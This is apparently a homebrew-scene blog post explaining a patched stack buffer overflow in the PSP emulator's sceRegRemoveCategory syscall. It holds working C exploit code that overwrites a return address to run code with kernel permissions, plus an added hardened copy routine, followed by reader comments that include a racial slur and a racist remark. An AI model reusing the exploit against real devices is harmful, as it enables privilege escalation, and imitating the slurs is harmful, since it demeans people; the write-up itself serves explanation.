Anatomy of a cool (undisclosed) kernel exploit

How many times have you heard “Kernel exploits are hard to find, devs can’t just release them!”?
Well, that’s not really true. To prove it, here I’m posting a pretty cool bug found a couple of years ago.

Of course, this exploit is patched by now; it wouldn’t make sense to waste a perfectly working exploit right now (even though there are many…), but I thought it’d be cool to show you guys this :)

But first, a bit of history.
In 2011, while investigating registry.prx, I noticed Sony made a pretty dumb error (yes, another one…), and started working with someone to exploit it.
It only took a few days to get a POC running; it’s probably one of the easiest exploits ever: a simple, dumb buffer overflow.
A year ago, I handed it over to jigsaw, who used it to investigate Syscall Internals (he did a pretty cool job btw ;)).

But now, the exploit.
Basically, we exploited a vulnerability in sceRegRemoveCategory. This syscall removes a category from the system registry (obviously). It takes two arguments: a REGHANDLE and a string.
The REGHANDLE is a value given to us by sceRegOpenRegistry when we open a valid registry, totally legit, but let’s take a look at that string…

The string is just the name of the category you want to get rid of. In the PSP’s system registry, all names start with a ‘/’, and sceRegRemoveCategory checks only that: the first character of the string.

Actually, it also checks whether the provided string lies in kernel space, but that doesn’t matter in this case.
RemoveCategory allocates 0x1B (27) bytes on its stack, then calls a subroutine that basically copies our string into that space… but it never checks the length of our string!

See the problem here? We can easily overflow that buffer by providing a string that looks like this: ‘/<27+ random chars>’.
The return address is stored 0x54 (90) bytes later on the stack, so we can just overwrite it and wait for sceRegRemoveCategory to return, even with an error; we don’t care ;)

tl;dr, here’s a code snippet; callback_addr is the address of the function you want to execute with kernel permissions.

 #include <string.h>
 #include <pspreg.h> // PSPSDK registry API: struct RegParam, REGHANDLE, sceRegOpenRegistry, sceRegRemoveCategory
 // callback_addr: address of the function to run with kernel permissions, set by the caller

 char rmc_stack[0x5A]; // 0x5A (90) bytes: long enough to run past the 0x1B-byte stack buffer
 struct RegParam exp_params;
 REGHANDLE exp_handle;

 memset(&exp_params, 0, sizeof(exp_params));

 exp_params.regtype = 1;
 exp_params.unk2 = 1;
 exp_params.unk3 = 1;
 exp_params.namelen = strlen("/system");

 strcpy(exp_params.name, "/system");

 if(!sceRegOpenRegistry(&exp_params, 2, &exp_handle)) //Need a valid registry handle to continue (returns 0 on success)
 {
   memset(rmc_stack, 'X', 0x5A); //Fill the string with crap
   rmc_stack[0] = '/'; //This is enough to fool registry...
   rmc_stack[0x5A - 1] = 0; //Terminator, so the copy stops here
   //The four bytes before the terminator land on the saved return address (little-endian)
   rmc_stack[0x5A - 2] = (callback_addr >> 24) & 0xFF;
   rmc_stack[0x5A - 3] = (callback_addr >> 16) & 0xFF;
   rmc_stack[0x5A - 4] = (callback_addr >> 8) & 0xFF;
   rmc_stack[0x5A - 5] = callback_addr & 0xFF;
   sceRegRemoveCategory(exp_handle, rmc_stack); //;)
 }
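For contrast, here is what the copy routine should have looked like. This is an added example written for this page, not Sony's code and not part of the original post: the leading ‘/’ check stays, and the name is additionally required to fit in the 0x1B-byte buffer (size taken from the post) before anything is copied. Function names and error codes are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Size of the name buffer sceRegRemoveCategory keeps on its stack, per the post (0x1B = 27 bytes). */
#define REG_NAME_BUF 0x1B

/* Assumed error codes; the real syscall's values are not given in the post. */
enum reg_err { REG_OK = 0, REG_ERR_BAD_PREFIX = -1, REG_ERR_TOO_LONG = -2 };

/* Bounded length: never scans past 'limit' bytes, so an unterminated name is harmless. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Hardened copy: checks the leading '/' (which the real routine does) AND that the
   name plus its terminator fits in dst (which the real routine did not). */
static int copy_category_checked(char *dst, size_t dstsz, const char *name)
{
    if (name == NULL || name[0] != '/')
        return REG_ERR_BAD_PREFIX;
    size_t n = bounded_len(name, dstsz);
    if (n >= dstsz)                 /* no room for the NUL: reject instead of overflowing */
        return REG_ERR_TOO_LONG;
    memcpy(dst, name, n + 1);
    return REG_OK;
}

/* Stand-in for the syscall: a 27-byte stack buffer filled by the checked copy.
   The original, as the post describes it, did the equivalent of strcpy(buf, name)
   right after the '/' check, which is exactly the overflow. */
int remove_category_hardened(const char *name)
{
    char buf[REG_NAME_BUF];
    int rc = copy_category_checked(buf, sizeof buf, name);
    if (rc != REG_OK)
        return rc;
    /* ... category lookup and removal would follow here ... */
    return REG_OK;
}

/* Constructed test input: '/' followed by len-1 'X' bytes, like the post's '/<27+ random chars>'. */
const char *constructed_name(size_t len)
{
    static char s[0x5A + 1];
    if (len == 0 || len > 0x5A) return "";
    memset(s, 'X', len);
    s[0] = '/';
    s[len] = '\0';
    return s;
}
```

A 26-character name still fits (26 bytes plus the terminator), while 27 characters or more, including the 0x5A-byte string from the snippet above, is rejected before the copy happens.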

As I said, this is patched by now (I think it was patched in the latest PSV update, not sure), but that doesn’t mean you can’t implement it, maybe on some older firmware, for exercise.

I’m honestly surprised it took this long for Sony to patch this, especially when they made the same error in loadexec, back in 2.50 (iirc).

This shows how easy it is to break pspemu security; maybe it’s time to put our resources into something more interesting…

- Freddy

  1. nigga’s avatar

    not interested

    Reply

  2. BattyCrease’s avatar

    Interesting read, Freddy. Not checking string lengths really should be a fireable offense. ^^

    Reply

    1. Different55’s avatar

      Don’t say that. The glorious people who allow exploits like this should be praised for making it easy for the devs.

      Reply

  3. EIREXE’s avatar

    The point on kernel exploits is that they are limited

    Reply

  4. yosh’s avatar

    “This shows how easy it is to break pspemu security, maybe it’s time to put our resources into something more interesting…”

    Agreed lol, though that’s why it’s so funny xD

    Reply

  5. yosh’s avatar

    Indeed I just checked and saw it, though it was removed in fw 1.80, only available until 1.67.
    In 1.80 though it doesn’t seem Sony patched it, rather they dummied sceRegRemoveCategory with dummy return values lol so maybe they didn’t even notice this.

    Reply

    1. yosh’s avatar

      1.69X also still have it though naturally

      Reply

  6. wartaf’s avatar

    nice, but I dunno what it really does :p

    Reply

  7. Davee’s avatar

    Oh freddy, you don’t give yourself enough credit!

    Reply

    1. yosh’s avatar

      True, nice work freddy

      Reply

    2. SuzieJoeBob’s avatar

      It is still pretty interesting though. Sony didn’t remove the system call, but rather just gave it pre-determined (dummy) return values. If one was able to overwrite this system call with the old one, would the portions of old exploits relating to this system call work yet again???

      Reply

      1. SSJ-Vita’s avatar

        I like the way you think, if it could be done MHFU FTW

        Reply

  8. Adx2’s avatar

    maybe sony might have done the same mistake in psvita security… my saying is that the key is in the firmware stored in the vita like the psp was hiding but someone discovered the key and very soon psp was hacked and so if the psvita has the same security and a genius guy finds it the vita might be very hacked soon… ALL IT TAKES IS A LITTLE PUSH

    Reply

    1. hgoel0974’s avatar

      same security? Sorry, but no, they do not have the same security.

      Reply

      1. gunblade’s avatar

        still wandering on the vita live screen sony made update in 2.12 think with all the patches sony did since the vita’s release psp xmb with xbox boot sounds cool.. i guess would need to get more into the vita side to play with the psp boot screen but did try with ark yet… ark still pretty cool..

        Reply

  9. Adx2’s avatar

    var is pavit hacked = prompt (“IS PSVITA HACKED”)
    if
    (“psvita is hacked”){
    console.log (“very good”)
    }else{
    console.log (“very bad”)
    {

    Reply

    1. svenn’s avatar

      I have no idea what language you use, but there is def at least 1 syntax error in it.

      Reply

  10. Vita001’s avatar

    Time to bring out the vita exploits…

    Reply

  11. Adx2’s avatar

    security may not be the whole same cuz sony is said to be learning from its mistakes … But minor security may be same … we do not know right now what is same and what’s not, let’s see it in future when the psvita will be completely hacked then we will see what’s same and what not……

    Reply

    1. xoombie503’s avatar

      all we know is that you need to go back to school, or that you are black.

      Reply

      1. DeathOfChaos’s avatar

        I’ve been contemplating whether to update my TN-V Vita or not and this article really got me thinking about updating, lol. Been tired of not updating my trophies, lol.

        Reply

      2. DeathOfChaos’s avatar

        Pretty racist, but ok…

        Reply

      3. NeonAera’s avatar

        @xoombie503

        Adx2 is just talking about Sony’s encryption securities and about the possibilities of hacking the Vita etc.. So what do you mean go back to school and that racist remark? So what if his spelling and grammar isn’t all that great, this place is not a writing center where everyone’s punctuation has to be right-on all the time. And sometimes people like to use shorter words.. doesn’t mean they need to go back to school.

        So xoombie503 stop being a trolling racist jerk and gtfo man…

        @Adx2

        Don’t take zoombie seriously.. He could just be trolling to try and spark a fire, or just a seriously messed up person in real life that sadly enjoys to curse, hate, bully, and take it out on people hiding behind their computer screen because it’s easier.

        Take care man.

        Anyway nice article, freddy_156.

        Reply

        1. you can read’s avatar

          the things that are coming out of his hands?

          Reply

  12. Hackinformer’s avatar

    This is a great article but I’m bored with psp emulation. This is history repeating itself. User-mode is great but it is very hard to get a lot of stuff working on it and I’m stuck at 2.10 FW. And like you said Freddy “maybe it’s time to put our resources into something more interesting…” and with all the new Open-source OS’s and ARM development boards, I think you may be right..

    Reply

  13. Miguel’s avatar

    There is far more development happening on the 3ds side of things versus the vita. We need more people to invest time into breaking the security of the vita and actually be able to use the full specs of the vita and not just enough to see it emulate psp stuff :(

    Reply

    1. Kyu’s avatar

      If you mean the bootloader, yes.
      Though the bootloader is only that, no homebrews/emulators/freedom.

      Reply

  14. adriandevera’s avatar

    Wonderful, I have a 1.67 right now! Sadly I still can’t seem to get Open CMA 4.5 to muster on the current vita I have.. Uno still waiting on the ps3 as well… sigh

    Reply

    1. gunblade’s avatar

      looks like u can tweak with ur ps3 i guess was thinking but u need a ps3 with cfw. 1.67 sweet though think the vita i am on came with 1.80 which is shitty as to the first one i had came brand new n homebrew n other os ready but i had to update it n not watch youtube first but anyway downgrading the psp was said to go to like 1.51 and 1.50 for japan or something..

      Reply

  15. DarkenLX’s avatar

    isn’t the buffer overflow the same as the stack overflow in windows pc and whatnot?

    Reply

    1. wololo’s avatar

      No. A stack overflow is a specific case of buffer overflow, and none of this is specific to windows vs pc vs psp.

      Reply

  16. Chuckthetekkie’s avatar

    Nintendo made a similar mistake with Twilight Princess for the Wii where you could edit the save file and make the horse’s name longer than what was allowed and it caused a buffer overflow. Since retail Wii games can’t be updated Nintendo had to patch the bug in the Wii system software by having the system software explicitly check the save file and if the horse’s name was too long it would delete the save file. Although it took Nintendo a few tries to get it right.

    It seems really silly to have a string value and not check to make sure the value is of the right length and if not, do some kind of error. Then again Sony probably outsourced their programmers and don’t pay them enough to check for serious bugs like this.

    Reply

  17. somthing something something light side’s avatar

    I would really like an actual PSV hack, not for backup games but imagine the emulating possibilities, I could play Banjo Tooie on it with no lag at all

    Reply

  18. SSJ-Vita’s avatar

    Go Go Gadget 2035 psv Ecfw!

    Reply

  19. svenn’s avatar

    Well, saying this string is unchecked and knowing how to use it are two different things; though this is in no way a proof of the amount of kexploits still in the PSP kernel.

    Reply

  20. gunblade’s avatar

    i still have 2.12 downloaded n ready to install on the vita on 2.06 last i checked. shitty thing would be where u need a vita at like 150 to downgrade a 2.06 vita last i checked sony was running the new 2.. on the vita at 1.80 and 2.02

    Reply

  21. gunblade’s avatar

    i was facebook app need an update…..

    Reply

  22. nevercall’s avatar

    I hate myself for whenever I see code, I WANT TO BANG MY HEAD ON THE KEYBOARD and say to myself… WHY DIDN’T I KNOW THIS!! Why can’t I UNDERSTAND THIS THING!!

    #include <iostream>
    using namespace std;

    int main(){

    cout << "as of now, this is the only thing i can do and all other arithmetic calculations and some knowledge on variables" << endl;

    return 0;

    }

    I WANT TO LEARN TO CODE.

    Reply

    1. capcomlegend’s avatar

      don’t feel bad, all I know is su fix_permission in terminal on my android, makes me look cool when i eat at a dinner with a cute waitress around lol

      Reply

    2. adriandevera’s avatar

      tbh… C and C++ are really horrible and not noob friendly.. I tried coding that in middle school for nds homebrew and it didn’t come out too well.

      So I tried with Objective C and learned it relatively much quicker. I think the syntax for Objective C makes more sense and is far more intuitive than that of the older C itself..

      Reply

  23. Adx2’s avatar

    @NeonAera thanks for supporting me …

    and

    @xoombie503 are u a grammar teacher u dumbshit ..NAH JUST JOKING :)

    Reply

  24. Adx2’s avatar

    @nevercall
    i think u should visit code.org and u can learn to code..
    I’m learning javascript programming on code.org, u can learn anything related to coding there, it’s really helpful

    Reply

    1. nevercall’s avatar

      I’m on it.. and yeah, it’s quite useful… but hey, do I really need to learn all of those just to tell my computer like:

      “hey computer, I’m downloading a file right now, if it’s a video file, move it to the videos folder I specified, if it’s a music file, move it to the music folder I specified, if the title contains “sex, porn, lesbian, xxx, brazzers, hentai, loli, teens, virgin, asian and other stuff like that” move it to the “system hidden” folder I specified, ELSE, retain it in my downloads folder.”

      what i mean is, I just want to learn what can be useful for my everyday life.

      Reply
